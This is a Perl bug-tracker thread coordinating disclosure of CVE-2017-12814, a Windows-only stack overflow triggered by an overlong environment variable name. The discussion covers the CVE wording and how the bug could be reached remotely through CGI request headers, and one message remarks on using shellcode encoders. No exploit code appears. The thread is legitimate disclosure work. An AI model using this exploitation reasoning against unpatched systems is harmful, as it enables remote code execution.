On 23 September 2017 at 03​:49, Tony Cook <tony@​develop-help.com> wrote​:

Yes, custom CGI headers are passed through with the header name
upper-cased, - replaced with _ and HTTP_ prefixed.

https://tools.ietf.org/html/rfc3875#section-4.1.18

Tony

On Fri, Sep 22, 2017 at 06​:28​:11PM -0700, john@​autosectools.com wrote​:

Addendum​: a quick search for an example revealed that custom headers may be stored in env​:

https://stackoverflow.com/questions/4007007/how-do-i-access-the-http-header-of-request-in-a-cgi-script

I will investigate further this weekend, but there's a good chance this is a viable exploitation vector.

--------- Original Message --------- Subject​: RE​: [perl #131665] [CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow
From​: john@​autosectools.com
Date​: 9/22/17 6​:23 pm
To​: perl5-security-report-followup@​perl.org
Cc​: andyg@​activestate.com, daver@​activestate.com

Hi all,

One quick but important nitpick. This vulnerability is described as a possible stack overflow here​: https://metacpan.org/changes/release/SHAY/perl-5.26.1-RC1#%5BCVE-2017-12814%5D-$ENV%7B$key%7D-stack-buffer-overflow-on-Windows

While it's true that I said this is possibly exploitable depending on context, there is no question that it is a stack overflow, as the exploit PoC demonstrates. Further, I prefixed my exploitability claim with "possibly" solely to avoid speaking in absolutes. I would say this is highly exploitable in most scenarios that expose env keys as attack surface.

Our main concern here is that people may underestimate the severity, and our advisory will contain multiple exploits demonstrating scenarios wherein this can be remote. Internally (we don't name bugs as that's rather tacky) we affectionately refer to this one as "PerlShock," and it is by far the most critical issue we have discovered in a language to date.

To provide an example, it's not uncommon for CGI web apps to save query strings name value pairs as env vars. In this case, the vulnerability would be exploitable through said query string. Though we have no concrete statistics, we have seen this pattern in the wild and thus expect this issue to have real-world ramifications.

John

--------- Original Message --------- Subject​: [perl #131665] [CVE-2017-12814]Perl $ENV Key Stack Buffer Overflow
From​: "Tony Cook via RT" <perl5-security-report-followup@​perl.org>
Date​: 9/11/17 4​:50 pm
To​: john@​autosectools.com
Cc​: andyg@​activestate.com, daver@​activestate.com

On Fri, 11 Aug 2017 17​:52​:21 -0700, tonyc wrote​:

On Fri, 11 Aug 2017 03​:17​:17 -0700, tonyc wrote​:

I've requested a CVE ID for this issue.

This is CVE-2017-12814.

The details I entered when requesting the CVE ID​:

[Suggested description]
Will be made public once co-ordinated release is done.
------------------------------------------
[Vulnerability Type]
Buffer Overflow

------------------------------------------
[Vendor of Product]
Perl5 Porters
------------------------------------------
[Affected Product Code Base]
perl - 5.005_03 through 5.26
------------------------------------------
[Affected Component]

------------------------------------------
[Attack Type]
Local

------------------------------------------
[Impact ]

[+] CVE_Request.Impact_Code_execution
[-] CVE_Request.Impact_Denial_of_Service
[-] CVE_Request.Impact_Escalation_of_Privileges
[-] CVE_Request.Impact_Information_Disclosure
------------------------------------------
[Attack Vectors]

------------------------------------------
[Reference ]

------------------------------------------
[Discoverer ]
John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com)

Proposed update for the CVE entry once the issue is public (the field names are from the CVE allocation form)​:

Suggested description​:

Stack buffer overflow with crafted environment variable, leading to code execution

Affected components​:

CPerlHost​::Add() in win32/perlhost.h

Attack vector​:

An attacker can provide a long environment variable name
overflowing a stack allocated buffer.

This issue only occurs for Win32 builds of perl.

Discoverer​:

John Leitch (john@​autosectools.com), Bryce Darling (darlingbryce@​gmail.com) (no change)

Affected Product Code Base​:

perl - 5.005_03 through 5.26 (no change)

References​:

https://rt.perl.org/Public/Bug/Display.html?id=131665

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 25, 2017

From @tonycoz

On Sat, Sep 23, 2017 at 01​:33​:29PM +0200, Sawyer X wrote​:

Based on this, should we postpone the disclosure of the RT ticket?

On 23 September 2017 at 03​:49, Tony Cook <tony@​develop-help.com> wrote​:

Yes, custom CGI headers are passed through with the header name
upper-cased, - replaced with _ and HTTP_ prefixed.

https://tools.ietf.org/html/rfc3875#section-4.1.18

No, it's an obvious consequence of the now public patch.

5.26.1/5.24.3 (and 5.27.4) have been released so we can't change the
description in those releases.

We can go back and change the relevant perldeltas in
maint-5.24. maint-5.26 and blead (in blead so the 5.28.0 perldelta
gets the better description.)

Here's a possible replacement pod section​:

=head2 [CVE-2017-12814] C<$ENV{$key}> stack buffer overflow on Windows

A very long environment variable would produce a buffer overflow on a
stack allocated buffer. This has been leveraged into local code
execution.

If the environment variable was remotely sourced, such as with CGI,
this could indirectly lead to remote code execution.

L<[perl #131665]|https://rt.perl.org/Public/Bug/Display.html?id=131665>

<<

John, did my updated CVE details get through to you, and do you think
they covered the issue adequately? Repeated below​:

Suggested description​:

Stack buffer overflow with crafted environment variable, leading to code execution.

Affected components​:

CPerlHost​::Add() in win32/perlhost.h

Attack vector​:

An attacker can provide a long environment variable name overflowing a
stack allocated buffer.

This issue only occurs for Win32 builds of perl.

<<

Tony

(Something in the formatting has messed up RT's rendering of the
ticket history.)

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 25, 2017

From @tonycoz

On Mon, Sep 25, 2017 at 10​:13​:42AM +1000, Tony Cook wrote​:

=head2 [CVE-2017-12814] C<$ENV{$key}> stack buffer overflow on Windows

A very long environment variable would produce a buffer overflow on a
stack allocated buffer. This has been leveraged into local code
execution.

Urr, "On Win32, " at the beginning of that.

Tony

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 25, 2017

From @AutoSecTools

Looks good. Unfortunately, I got sucked into another project and didn't
get a chance to do any testing this weekend, but alpha upper shellcode
encoders are publicly available. Given that, there's a good chance this
is exploitable through the CGI vector despite the constraints.

John

On 9/24/2017 05​:14 PM, Tony Cook via RT wrote​:

On Sat, Sep 23, 2017 at 01​:33​:29PM +0200, Sawyer X wrote​:

Based on this, should we postpone the disclosure of the RT ticket?

On 23 September 2017 at 03​:49, Tony Cook <tony@​develop-help.com> wrote​:

Yes, custom CGI headers are passed through with the header name
upper-cased, - replaced with _ and HTTP_ prefixed.

https://tools.ietf.org/html/rfc3875#section-4.1.18
No, it's an obvious consequence of the now public patch.

5.26.1/5.24.3 (and 5.27.4) have been released so we can't change the
description in those releases.

We can go back and change the relevant perldeltas in
maint-5.24. maint-5.26 and blead (in blead so the 5.28.0 perldelta
gets the better description.)

Here's a possible replacement pod section​:

=head2 [CVE-2017-12814] C<$ENV{$key}> stack buffer overflow on Windows

A very long environment variable would produce a buffer overflow on a
stack allocated buffer. This has been leveraged into local code
execution.

If the environment variable was remotely sourced, such as with CGI,
this could indirectly lead to remote code execution.

L<[perl #131665]|https://rt.perl.org/Public/Bug/Display.html?id=131665>

<<

John, did my updated CVE details get through to you, and do you think
they covered the issue adequately? Repeated below​:

Suggested description​:

Stack buffer overflow with crafted environment variable, leading to code execution.

Affected components​:

CPerlHost​::Add() in win32/perlhost.h

Attack vector​:

An attacker can provide a long environment variable name overflowing a
stack allocated buffer.

This issue only occurs for Win32 builds of perl.

<<

Tony

(Something in the formatting has messed up RT's rendering of the
ticket history.)

@p5pRT p5pRT closed this Sep 25, 2017
@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 25, 2017

@xsawyerx - Status changed from 'open' to 'resolved'

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 25, 2017

From @xsawyerx

Now public.

@p5pRT

This comment has been minimized.

Copy link
Collaborator Author

@p5pRT p5pRT commented Sep 25, 2017

From @tonycoz

On Mon, Sep 25, 2017 at 03​:12​:23AM -0700, Sawyer X via RT wrote​:

Now public.

Update to CVE details submitted.

Tony

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
1 participant
You can’t perform that action at this time.